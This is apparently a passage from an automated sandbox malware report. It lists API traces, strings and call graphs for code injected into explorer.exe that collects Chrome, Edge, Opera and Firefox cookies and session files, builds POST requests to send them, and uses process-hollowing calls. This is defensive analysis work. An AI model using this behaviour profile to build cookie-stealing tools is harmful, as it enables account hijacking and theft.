                                                        • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                        • API String ID: 2886538537-1627781280
                                                        • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                        • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                                        • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                        • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                          • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                          • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                                        • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                                          • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                          • Part of subcall function 000815BE: FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                          • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                          • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                          • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                          • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                          • Part of subcall function 000815BE: FindClose.KERNEL32(00000000), ref: 000816AB
                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                                        • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                                        • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                        • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                        • API String ID: 909495591-1175993956
                                                        • Opcode ID: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                        • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                                        • Opcode Fuzzy Hash: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                        • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                          • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                          • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • Sleep.KERNEL32(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                                        • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                                        • wsprintfW.USER32 ref: 00083644
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                                        • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                        • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                        • API String ID: 2436889709-3669280581
                                                        • Opcode ID: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                        • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                                        • Opcode Fuzzy Hash: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                        • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 386 83132-83147 387 832ea-832f1 386->387 388 8314d-83179 386->388 390 8317b-8317f 388->390 391 83185-831e7 call 81000 388->391 390->387 390->391 397 831e9-831fa 391->397 398 83201-83226 call 81000 391->398 397->398 402 832d8-832e9 call 81011 * 2 398->402 403 8322c-83237 lstrlen 398->403 402->387 403->402 405 8323d-8324f call 81141 403->405 405->402 411 83255-832d2 call 81000 * 2 wsprintfA lstrcat call 81011 lstrcat lstrlen RtlMoveMemory 405->411 411->402
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000), ref: 0008322D
                                                        • wsprintfA.USER32 ref: 0008329E
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                                        • lstrlen.KERNEL32(00000000), ref: 000832C1
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                        • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                        • API String ID: 3430864794-1604029033
                                                        • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                        • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                                        • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                        • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 419 83449-8346c RtlEnterCriticalSection 420 8346e-83474 419->420 421 834d4-834dc 419->421 420->421 424 83476-83478 420->424 422 835bc-835cb RtlLeaveCriticalSection 421->422 423 834e2-834eb call 81274 421->423 423->422 429 834f1-834f7 423->429 424->422 426 8347e-83487 call 81274 424->426 426->421 433 83489-83496 call 81274 426->433 431 834fd-83520 RtlZeroMemory call 82f3d 429->431 432 835b3-835b7 call 82d06 429->432 431->422 439 83526-83535 StrToIntA 431->439 432->422 433->421 440 83498-834bc lstrcat call 82faa 433->440 439->422 441 8353b-8354d call 81141 439->441 446 834be call 82f1f 440->446 441->422 447 8354f-83556 441->447 448 834c3-834ce call 8105d 446->448 449 83558-8356d 447->449 450 83595-835aa call 82faa 447->450 448->421 452 8357b-8357e 449->452 453 8356f-83574 call 8105d 449->453 461 835ac call 82f1f 450->461 457 83580 call 8104c 452->457 453->452 460 83585-83593 RtlMoveMemory 457->460 460->422 462 835b1 461->462 462->422
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                                        • lstrcat.KERNEL32 ref: 000834AB
                                                          • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                          • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                                          • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                          • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                                          • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                          • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                                          • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                                          • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                                        • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                                        • StrToIntA.SHLWAPI(?), ref: 0008352B
                                                        • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                                        • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                        • String ID: $Content-Length:$POST
                                                        • API String ID: 2960674810-114478848
                                                        • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                        • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                                        • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                        • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Sleep.KERNEL32(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                                        • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                        • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                        • API String ID: 2731919298-637609321
                                                        • Opcode ID: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                        • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                                        • Opcode Fuzzy Hash: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                        • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                          • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                                          • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                                          • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                                        • wsprintfW.USER32 ref: 000819F2
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                                        Strings
                                                        • Accept: */*Referer: %S, xrefs: 000819E8
                                                        • POST, xrefs: 000819A0
                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                        • API String ID: 3833683434-704803497
                                                        • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                        • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                                        • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                        • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                                        APIs
                                                          • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                        • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                                        • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                                        • lstrcat.KERNEL32(?,?), ref: 000825D6
                                                        • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$AllocVirtual
                                                        • String ID: :authority$?$dyn_header
                                                        • API String ID: 3028025275-1785586894
                                                        • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                        • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                                        • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                        • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                        • String ID:
                                                        • API String ID: 868014591-0
                                                        • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                        • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                                        • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                        • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91
                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                                        • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                                        • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$MemoryMovelstrcat
                                                        • String ID: cookie
                                                        • API String ID: 2957667536-1295510418
                                                        • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                        • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                                        • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                        • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                                        • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID:
                                                        • API String ID: 331459951-0
                                                        • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                        • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                                        • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                        • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                                        • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID: POST
                                                        • API String ID: 3168844106-1814004025
                                                        • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                        • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                                        • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                        • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                                        Execution Graph

                                                        Execution Coverage:6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:19
                                                        Total number of Limit Nodes:3
                                                        execution_graph 1566 ed5da 1567 ed614 1566->1567 1568 ed748 3 API calls 1567->1568 1569 ed6f8 1567->1569 1568->1569 1548 ed748 1550 ed74d 1548->1550 1549 ed835 LoadLibraryA 1549->1550 1550->1549 1552 ed884 VirtualProtect VirtualProtect 1550->1552 1554 ed879 1550->1554 1553 ed912 1552->1553 1553->1553 1555 ed637 1556 ed62e 1555->1556 1558 ed6f8 1556->1558 1559 ed748 1556->1559 1561 ed74d 1559->1561 1560 ed835 LoadLibraryA 1560->1561 1561->1560 1563 ed884 VirtualProtect VirtualProtect 1561->1563 1565 ed879 1561->1565 1564 ed912 1563->1564 1564->1564 1565->1558

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_000E370C 5 Function_000E1A04 0->5 1 Function_000ECC0D 2 Function_000ED70A 3 Function_000E1D08 111 Function_000E1CD0 3->111 4 Function_000E1508 6 Function_000E5104 6->5 9 Function_000E2C00 6->9 27 Function_000E1C28 6->27 30 Function_000E3F20 6->30 35 Function_000E1938 6->35 36 Function_000E1838 6->36 44 Function_000E4C40 6->44 65 Function_000E1B74 6->65 74 Function_000E1C80 6->74 89 Function_000E1CA0 6->89 100 Function_000E1BC8 6->100 113 Function_000E1BE8 6->113 7 Function_000E1405 8 Function_000E5300 8->6 8->8 8->36 77 Function_000E4C80 8->77 8->113 17 Function_000E2B14 9->17 105 Function_000E29C0 9->105 9->113 10 Function_000E1000 11 Function_000E4B1E 12 Function_000E311C 13 Function_000E211C 14 Function_000E141D 15 Function_000E3818 15->0 15->5 15->36 58 Function_000E1860 15->58 85 Function_000E3690 15->85 110 Function_000E18D0 15->110 114 Function_000E18E8 15->114 115 Function_000E21E4 15->115 16 Function_000ED416 18 Function_000E2214 18->36 19 Function_000E4A14 20 Function_000E4C14 21 Function_000E4914 21->3 21->36 21->58 95 Function_000E1EB4 21->95 22 Function_000E4710 22->5 81 Function_000E4094 22->81 104 Function_000E3FC0 22->104 22->110 22->113 22->114 121 Function_000E3FF8 22->121 124 Function_000E3CF0 22->124 23 Function_000E2F10 23->36 24 Function_000E4B2E 25 Function_000E4C2E 26 Function_000ED42D 28 Function_000E3424 29 Function_000E1822 39 Function_000E3E4C 30->39 31 Function_000E3C3C 41 Function_000E3B48 31->41 47 Function_000E345C 31->47 31->114 32 Function_000E343C 33 Function_000E4A38 33->3 33->36 33->95 34 Function_000E2838 37 Function_000ED637 42 Function_000ED748 37->42 38 Function_000E624F 39->36 39->58 40 Function_000E3048 40->36 41->23 61 Function_000E317C 41->61 42->2 43 Function_000E4C42 44->3 44->21 44->33 44->36 91 Function_000E4ABC 44->91 44->95 45 Function_000E4540 75 Function_000E4280 45->75 45->104 45->113 46 Function_000E4B5E 47->36 70 Function_000E188C 47->70 47->113 48 Function_000E4C5C 49 Function_000E1254 50 Function_000E2754 51 Function_000E4B6F 52 Function_000E156C 53 Function_000E2368 53->35 53->36 53->58 53->70 80 Function_000E2298 53->80 53->110 120 Function_000E18F8 53->120 54 Function_000E2964 78 Function_000E299C 54->78 55 Function_000ECD63 56 Function_000E3F60 56->18 56->58 67 Function_000E268C 56->67 56->114 57 Function_000E1560 58->113 59 Function_000ED57E 60 Function_000E497F 61->12 61->40 61->58 82 Function_000E3094 61->82 61->110 62 Function_000E277C 62->50 62->54 62->110 63 Function_000E4A7C 64 Function_000E1576 66 Function_000E628F 67->36 67->53 67->58 68 Function_000E1D8C 69 Function_000E1A8C 70->36 71 Function_000E3B8C 71->5 71->41 71->47 71->114 72 Function_000E2F88 73 Function_000E2F84 75->5 75->36 75->58 76 Function_000E4680 76->75 76->104 76->113 77->13 77->36 77->58 77->62 77->69 79 Function_000E3D9C 77->79 109 Function_000E28D4 77->109 77->113 81->5 81->36 81->58 81->121 82->36 82->58 82->72 83 Function_000ECD92 84 Function_000E3A90 84->18 84->58 84->67 84->114 85->5 86 Function_000E3CAC 86->47 87 Function_000E4AA9 88 Function_000E44A4 88->81 88->104 88->124 90 Function_000E4BA0 91->3 91->36 108 Function_000E1FD4 91->108 92 Function_000ED0BB 93 Function_000E4BB8 94 Function_000ECFB7 95->36 95->58 95->68 97 Function_000E1DB0 95->97 96 Function_000E14B2 97->36 97->58 97->68 97->95 98 Function_000E1FB0 99 Function_000E4BB0 101 Function_000E49C6 102 Function_000ED4C4 103 Function_000ED0C3 106 Function_000ED5DA 106->42 107 Function_000E14D4 108->36 108->58 108->98 108->108 109->34 109->50 109->113 112 Function_000E72D0 116 Function_000ECCE2 117 Function_000E45E0 117->75 117->104 117->113 118 Function_000E35FC 118->58 118->113 119 Function_000E49FA 121->5 122 Function_000E14F9 123 Function_000E3AF0 123->15 123->118 124->28 124->31 124->32 124->71 124->86 124->113 124->123

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 104 e5300-e5310 call e1be8 107 e5312-e5345 call e1838 104->107 108 e5390-e5395 104->108 112 e5347 call e1838 107->112 113 e5371-e538a NtUnmapViewOfSection 107->113 119 e534c-e5365 112->119 114 e539c-e53ab call e5104 113->114 115 e538c-e538e 113->115 123 e53ad-e53b0 call e5300 114->123 124 e53b5-e53be 114->124 115->108 117 e5396-e539b call e4c80 115->117 117->114 119->113 123->124
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E5378
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                        • Instruction ID: bd129d4dbaa6a4f5a0d3126f6d5f59154c7ee90844e48c327c9209267a2d9f65
